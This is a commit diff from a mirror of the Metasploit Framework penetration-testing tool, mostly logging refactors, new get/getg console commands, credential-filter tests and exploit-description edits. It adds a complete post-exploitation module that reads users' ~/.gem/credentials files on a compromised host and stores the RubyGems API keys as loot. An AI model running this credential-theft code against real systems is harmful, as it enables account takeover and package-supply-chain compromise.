infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into bug/4634/blank-username 

Conflicts:
	lib/msf/ui/console/command_dispatcher/db.rb
	spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
bug/bundler_fix
James Lee 2015-01-27 08:40:07 -06:00
parent aea26e1e21 515b125192
commit eac7b11a87
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
34 changed files with 452 additions and 135 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
features/commands/help.feature
View File

@ -19,6 +19,8 @@ Feature: Help command
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a variable
getg Gets the value of a global variable
go_pro Launch Metasploit web GUI
grep Grep the output of another command
help Help menu

11
lib/msf/base/simple/auxiliary.rb
View File

@ -151,19 +151,17 @@ protected
rescue ::Exception => e
mod.error = e
mod.print_error("Auxiliary failed: #{e.class} #{e}")
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.auxiliary.rb/
mod.print_error(" #{line}")
end
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
end
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
mod.cleanup
return
@ -184,3 +182,4 @@ end
end
end

11
lib/msf/base/simple/exploit.rb
View File

@ -147,17 +147,7 @@ module Exploit
exploit.error = e
exploit.print_error("Exploit failed: #{e}")
elog("Exploit failed (#{exploit.refname}): #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
exploit.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.exploit.rb/
exploit.print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
end
return driver.session if driver
@ -209,3 +199,4 @@ end
end
end

11
lib/msf/base/simple/post.rb
View File

@ -121,19 +121,17 @@ protected
rescue ::Exception => e
mod.error = e
mod.print_error("Post failed: #{e.class} #{e}")
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.post.rb/
mod.print_error(" #{line}")
end
elog("Call stack:\n#{$@.join("\n")}", 'core', LEV_0)
end
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
dlog("Call stack:\n#{$@.join("\n")}", 'core', LEV_3)
mod.cleanup
return
@ -156,3 +154,4 @@ end
end
end

13
lib/msf/core/exploit_driver.rb
View File

@ -271,20 +271,14 @@ protected
exploit.fail_reason = Msf::Exploit::Failure::Unknown
end
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
if exploit.fail_reason == Msf::Exploit::Failure::Unknown
exploit.print_error("Exploit failed: #{msg}")
exploit.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.core.exploit_driver.rb/
exploit.print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
else
exploit.print_error("Exploit failed [#{exploit.fail_reason}]: #{msg}")
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
end
elog("Exploit failed (#{exploit.refname}): #{msg}", 'core', LEV_0)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
end
# Record the error to various places
@ -335,3 +329,4 @@ protected
end
end

5
lib/msf/core/rpc/v10/rpc_core.rb
View File

@ -15,6 +15,11 @@ class RPC_Core < RPC_Base
self.service.stop
end
def rpc_getg(var)
val = framework.datastore[var]
{ var.to_s => val.to_s }
end
def rpc_setg(var, val)
framework.datastore[var] = val
{ "result" => "success" }

8
lib/msf/ui/console/command_dispatcher/auxiliary.rb
View File

@ -120,17 +120,12 @@ class Auxiliary
print_error("Auxiliary interrupted by the console user")
rescue ::Exception => e
print_error("Auxiliary failed: #{e.class} #{e}")
elog("Auxiliary failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
return false
@ -157,3 +152,4 @@ class Auxiliary
end
end end end end

77
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -115,6 +115,8 @@ class Core
"color" => "Toggle color",
"exit" => "Exit the console",
"edit" => "Edit the current module with $VISUAL or $EDITOR",
"get" => "Gets the value of a variable",
"getg" => "Gets the value of a global variable",
"go_pro" => "Launch Metasploit web GUI",
"grep" => "Grep the output of another command",
"help" => "Help menu",
@ -2298,6 +2300,81 @@ class Core
return tabs
end
def cmd_get_help
print_line "Usage: get var1 [var2 ...]"
print_line
print_line "The get command is used to get the value of one or more variables."
print_line
end
#
# Gets a value if it's been set.
#
def cmd_get(*args)
# Figure out if these are global variables
global = false
if (args[0] == '-g')
args.shift
global = true
end
# No arguments? No cookie.
if args.empty?
global ? cmd_getg_help : cmd_get_help
return false
end
# Determine which data store we're operating on
if (active_module && !global)
datastore = active_module.datastore
else
datastore = framework.datastore
end
args.each { |var| print_line("#{var} => #{datastore[var]}") }
end
#
# Tab completion for the get command
#
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_get_tabs(str, words)
datastore = active_module ? active_module.datastore : self.framework.datastore
datastore.keys
end
def cmd_getg_help
print_line "Usage: getg var1 [var2 ...]"
print_line
print_line "Exactly like get -g, get global variables"
print_line
end
#
# Gets variables in the global data store.
#
def cmd_getg(*args)
args.unshift('-g')
cmd_get(*args)
end
#
# Tab completion for the getg command
#
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_getg_tabs(str, words)
self.framework.datastore.keys
end
def cmd_unset_help
print_line "Usage: unset [-g] var1 var2 var3 ..."
print_line

10
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -887,6 +887,16 @@ class Db
query.find_each do |core|
# Exclude non-blank username creds if that's what we're after
if user && user.empty? && !(core.public && core.public.username.blank?)
next
end
# Exclude non-blank password creds if that's what we're after
if pass && pass.empty? && !(core.private && core.private.data.blank?)
next
end
if core.logins.empty?
tbl << [

8
lib/msf/ui/console/command_dispatcher/exploit.rb
View File

@ -121,18 +121,12 @@ class Exploit
raise $!
rescue ::Exception => e
print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
elog("Exploit exception (#{mod.refname}): #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if(e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
end

9
lib/msf/ui/console/command_dispatcher/post.rb
View File

@ -122,18 +122,12 @@ class Post
print_error("Post interrupted by the console user")
rescue ::Exception => e
print_error("Post failed: #{e.class} #{e}")
elog("Post failed: #{e.class} #{e}", 'core', LEV_0)
if e.kind_of?(Msf::OptionValidateError)
dlog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_3)
else
if (e.class.to_s != 'Msf::OptionValidateError')
print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple/
print_error(" #{line}")
end
elog("Call stack:\n#{e.backtrace.join("\n")}", 'core', LEV_0)
end
return false
@ -160,3 +154,4 @@ class Post
end
end end end end

8
modules/auxiliary/gather/huawei_wifi_info.rb
View File

@ -55,16 +55,16 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an un-authenticated information disclosure vulnerability in Huawei
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure including any stored SMS.
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jimson K James.',
'<tomsmaily[at]aczire.com>', # Msf module
'Jimson K James',
'Tom James <tomsmaily[at]aczire.com>', # Msf module
],
'References' =>
[

7
modules/auxiliary/gather/konica_minolta_pwd_extract.rb
View File

@ -14,10 +14,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q(
'Description' => %q{
This module will extract FTP and SMB account usernames and passwords
from Konica Minolta mfp devices. Tested models include: C224, C280,
283, C353, C360, 363, 420, C452,C452, C452, C454e, C554 ),
from Konica Minolta multifunction printer (MFP) devices. Tested models include
C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
},
'Author' =>
[
'Deral "Percentx" Heiland',

10
modules/auxiliary/gather/mcafee_epo_xxe.rb
View File

@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher at that (ECB). By default,
if installed with a local SQL Server instance, the SQL server is listening on all interfaces.
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has no changed the password for the initially created account since installation,
the attacker also now has the password for this account. By default, 'admin' is recommended.
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Any user account can be used to exploit this, all that is needed is a pair of credentials.
Any user account can be used to exploit this, all that is needed is a valid credential.
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.

2
modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb
View File

@ -19,7 +19,7 @@ class Metasploit4 < Msf::Auxiliary
'Misfortune Cookie' vulnerability which affects Allegro Software
Rompager versions before 4.34 and can allow attackers to authenticate
to the HTTP service as an administrator without providing valid
credentials, however more specifics are not yet known.
credentials.
),
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module

2
modules/auxiliary/voip/cisco_cucdm_call_forward.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM) 10 does not properly implement access control, which allows remote attackers to
modify user information. This module exploits the vulnerability for configure unauthorized
modify user information. This module exploits the vulnerability to configure unauthorized
call forwarding.
},
'Author' => 'fozavci',

2
modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM), before version 10, doesn't implement access control properly, which allows remote
attackers to modify user information. This module exploits the vulnerability to make
unauthorized speeddial manipulations.
unauthorized speeddial entity manipulations.
},
'Author' => 'fozavci',
'References' =>

4
modules/exploits/linux/local/desktop_privilege_escalation.rb
View File

@ -20,11 +20,11 @@ class Metasploit4 < Msf::Exploit::Local
'Description' => %q{
This module steals the user password of an administrative user on a desktop Linux system
when it is entered for unlocking the screen or for doing administrative actions using
policykit. Then it escalates to root privileges using sudo and the stolen user password.
PolicyKit. Then, it escalates to root privileges using sudo and the stolen user password.
It exploits the design weakness that there is no trusted channel for transferring the
password from the keyboard to the actual password verificatition against the shadow file
(which is running as root since /etc/shadow is only readable to the root user). Both
screensavers (xscreensaver/gnome-screensaver) and policykit use a component running under
screensavers (xscreensaver/gnome-screensaver) and PolicyKit use a component running under
the current user account to query for the password and then pass it to a setuid-root binary
to do the password verification. Therefore, it is possible to inject a password stealer
after compromising the user account. Since sudo requires only the user password (and not

6
modules/exploits/multi/http/manageengine_auth_upload.rb
View File

@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
to the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.
For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been

4
modules/exploits/multi/http/pandora_upload_exec.rb
View File

@ -13,9 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Name' => "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
upload which allows a user to upload arbitrary files to the '/images/' directory.

20
modules/exploits/unix/webapp/wp_symposium_shell_upload.rb
View File

@ -15,17 +15,15 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(
info,
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
'Description' => %q{WP Symposium Plugin for WordPress contains a
flaw that allows a remote attacker to execute
arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script
does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the
web server.},
'Description' => %q{
WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker
to execute arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script does not properly verify or
sanitize user-uploaded files. By uploading a .php file, the remote system will
place the file in a user-accessible path. Making a direct request to the
uploaded file will allow the attacker to execute the script with the privileges
of the web server.
},
'License' => MSF_LICENSE,
'Author' =>
[

1
modules/exploits/windows/browser/getgodm_http_response_bof.rb
View File

@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on

1
modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb
View File

@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on

1
modules/exploits/windows/fileformat/iftp_schedule_bof.rb
View File

@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
i-Ftp v2.20, caused by a long time value set for scheduled download.
By persuading the victim to place a specially-crafted Schedule.xml file
in the i-FTP folder, a remote attacker could execute arbitrary code on
the system or cause the application to crash. This module has been

4
modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb
View File

@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.
A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated
attacker to upload arbitrary files, including arbitrary JSP code. This module has been
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
},

2
modules/exploits/windows/mysql/mysql_start_up.rb
View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is Windows 7 friendly.
Up directory used by the module is present on Windows 7.
},
'Author' =>
[

2
modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb
View File

@ -24,7 +24,7 @@ module Metasploit3
'Description' => 'Listen for a connection. First, the port will need to be knocked from
the IP defined in KHOST. This IP will work as an authentication method
(you can spoof it with tools like hping). After that you could get your
shellcode from any IP. The socket will appear as "closed" helping us to
shellcode from any IP. The socket will appear as "closed," thus helping to
hide the shellcode',
'Author' =>
[

2
modules/payloads/stagers/windows/bind_hidden_tcp.rb
View File

@ -21,7 +21,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Hidden Bind TCP Stager',
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host',
'Description' => 'Listen for a connection from a hidden port and spawn a command shell to the allowed host.',
'Author' =>
[
'hdm', # original payload module (stager bind_tcp)

67
modules/post/multi/gather/rubygems_api_key.rb Normal file
View File

@ -0,0 +1,67 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'yaml'
class Metasploit4 < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'Multi Gather RubyGems API Key',
'Description' => %q{
This module obtains a user's RubyGems API key from ~/.gem/credentials.
},
'Author' => [
'Jonathan Claudius <jclaudius[at]trustwave.com>',
'Brandon Myers <bmyers[at]trustwave.com>'
],
'Platform' => %w{bsd linux osx unix},
'SessionTypes' => %w{shell},
'License' => MSF_LICENSE
))
end
def run
print_status('Finding ~/.gem/credentials')
paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
paths = paths.select { |f| file?(f) }
if paths.empty?
print_error('No users found with a ~/.gem/credentials file')
return
end
download_key(paths)
end
def download_key(paths)
print_status("Looting #{paths.count} files")
paths.each do |path|
path.chomp!
next if ['.', '..'].include?(path)
rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
next unless rubygems_api_key
print_good("Found a RubyGems API key: #{rubygems_api_key}")
loot_path = store_loot(
'rubygems.apikey',
'text/plain',
session,
rubygems_api_key,
'rubygems_api_key.txt',
'RubyGems API key'
)
print_good("RubyGems API key stored in #{loot_path}")
end
end
end

28
spec/lib/msf/core/rpc/v10/rpc_core_spec.rb Normal file
View File

@ -0,0 +1,28 @@
# -*- coding:binary -*-
require 'spec_helper'
require 'msf/core/rpc/v10/rpc_base'
require 'msf/core/rpc/v10/rpc_core'
require 'msf/core/rpc/v10/service'
describe Msf::RPC::RPC_Core do
include_context 'Msf::Simple::Framework'
let(:service) do
Msf::RPC::Service.new(framework)
end
let(:core) do
Msf::RPC::RPC_Core.new(service)
end
describe '#rpc_getg' do
it 'should show an empty value if the variable is unset' do
expect(core.rpc_getg('FOO')).to eq({'FOO' => ''})
end
it 'should show the correct value if the variable is set' do
core.rpc_setg('FOO', 'BAR')
expect(core.rpc_getg('FOO')).to eq({'FOO' => 'BAR'})
end
end
end

0
spec/lib/msf/ui/command_dispatcher/auxiliary_spec.rb → spec/lib/msf/ui/console/command_dispatcher/auxiliary_spec.rb
View File

68
spec/lib/msf/ui/command_dispatcher/core_spec.rb → spec/lib/msf/ui/console/command_dispatcher/core_spec.rb
View File

@ -95,4 +95,72 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
end
end
end
it { is_expected.to respond_to :cmd_get }
it { is_expected.to respond_to :cmd_getg }
def set_and_test_variable(name, framework_value, module_value, framework_re, module_re)
# set the current module
allow(core).to receive(:active_module).and_return(mod)
# always assume set variables validate (largely irrelevant because ours are random)
allow(driver).to receive(:on_variable_set).and_return(true)
# the specified global value
core.cmd_setg(name, framework_value) if framework_value
# set the specified local value
core.cmd_set(name, module_value) if module_value
# test the global value if specified
if framework_re
@output = []
core.cmd_getg(name)
@output.join.should =~ framework_re
end
# test the local value if specified
if module_re
@output = []
core.cmd_get(name)
@output.join.should =~ module_re
end
end
describe "#cmd_get and #cmd_getg" do
describe "without arguments" do
it "should show the correct help message" do
core.cmd_get
@output.join.should =~ /Usage: get /
@output = []
core.cmd_getg
@output.join.should =~ /Usage: getg /
end
end
describe "with arguments" do
let(:name) { ::Rex::Text.rand_text_alpha(10).upcase }
context "with an active module" do
let(:mod) do
mod = ::Msf::Module.new
mod.send(:initialize, {})
mod
end
it "should show no value if not set in the framework or module" do
set_and_test_variable(name, nil, nil, /^#{name} => $/, /^#{name} => $/)
end
it "should show the correct value when only the module has this variable" do
set_and_test_variable(name, nil, 'MODULE', /^#{name} => $/, /^#{name} => MODULE$/)
end
it "should show the correct value when only the framework has this variable" do
set_and_test_variable(name, 'FRAMEWORK', nil, /^#{name} => FRAMEWORK$/, /^#{name} => $/)
end
it "should show the correct value when both the module and the framework have this variable" do
set_and_test_variable(name, 'FRAMEWORK', 'MODULE', /^#{name} => FRAMEWORK$/, /^#{name} => MODULE$/)
end
end
end
end
end

167
spec/lib/msf/ui/command_dispatcher/db_spec.rb → spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
View File

@ -65,8 +65,134 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
it { is_expected.to respond_to :set_rhosts_from_addrs }
describe "#cmd_creds" do
let(:username) { "username" }
let(:password) { "password" }
let(:username) { "thisuser" }
let(:password) { "thispass" }
describe "-u" do
let(:nomatch_username) { "thatuser" }
let(:nomatch_password) { "thatpass" }
let(:blank_username) { "" }
let(:blank_password) { "" }
let(:nonblank_username) { "nonblank_user" }
let(:nonblank_password) { "nonblank_pass" }
before(:each) do
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: priv,
public: pub,
realm: nil,
workspace: framework.db.workspace)
nonblank_priv = FactoryGirl.create(:metasploit_credential_password, data: nonblank_password)
blank_pub = FactoryGirl.create(:metasploit_credential_blank_username)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: nonblank_priv,
public: blank_pub,
realm: nil,
workspace: framework.db.workspace)
nonblank_pub = FactoryGirl.create(:metasploit_credential_username, username: nonblank_username)
blank_priv = FactoryGirl.create(:metasploit_credential_password, data: blank_password)
core = FactoryGirl.create(:metasploit_credential_core,
origin: FactoryGirl.create(:metasploit_credential_origin_import),
private: blank_priv,
public: nonblank_pub,
realm: nil,
workspace: framework.db.workspace)
end
context "when the credential is present" do
it "should show a user that matches the given expression" do
db.cmd_creds("-u", username)
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" thisuser thispass Password",
]
end
it 'should match a regular expression' do
subject.cmd_creds("-u", "^#{username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" thisuser thispass Password",
]
end
it 'should return nothing for a non-matching regular expression' do
subject.cmd_creds("-u", "^#{nomatch_username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
]
end
context "and when the username is blank" do
it "should show a user that matches the given expression" do
db.cmd_creds("-u", blank_username )
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" nonblank_pass Password"
]
end
end
context "and when the password is blank" do
it "should show a user that matches the given expression" do
db.cmd_creds("-P", blank_password )
@output.should =~ [
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" nonblank_user Password"
]
end
end
end
context "when the credential is absent" do
context "due to a nonmatching username" do
it "should return a blank set" do
db.cmd_creds("-u", nomatch_username)
@output.should =~ [
"===========",
"Credentials",
"",
"---- ------- ------ ------- ----- ------------",
"host service public private realm private_type"
]
end
end
context "due to a nonmatching password" do
it "should return a blank set" do
db.cmd_creds("-P", nomatch_password)
@output.should =~ [
"===========",
"Credentials",
"",
"---- ------- ------ ------- ----- ------------",
"host service public private realm private_type"
]
end
end
end
end
describe "add-password" do
context "when no core exists" do
@ -94,44 +220,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
end
end
end
describe "-u" do
before(:each) do
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
FactoryGirl.create(:metasploit_credential_core,
private: priv,
public: pub,
realm: nil,
workspace: framework.db.workspace)
end
it 'should match a regular expression' do
subject.cmd_creds("-u", "^#{username}$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
" username password Password",
]
end
it 'should return nothing for a non-matching regular expression' do
subject.cmd_creds("-u", "^$")
@output.should =~
[
"Credentials",
"===========",
"",
"host service public private realm private_type",
"---- ------- ------ ------- ----- ------------",
]
end
end
end
describe "#cmd_db_export" do

0
spec/lib/msf/ui/command_dispatcher/exploit_spec.rb → spec/lib/msf/ui/console/command_dispatcher/exploit_spec.rb
View File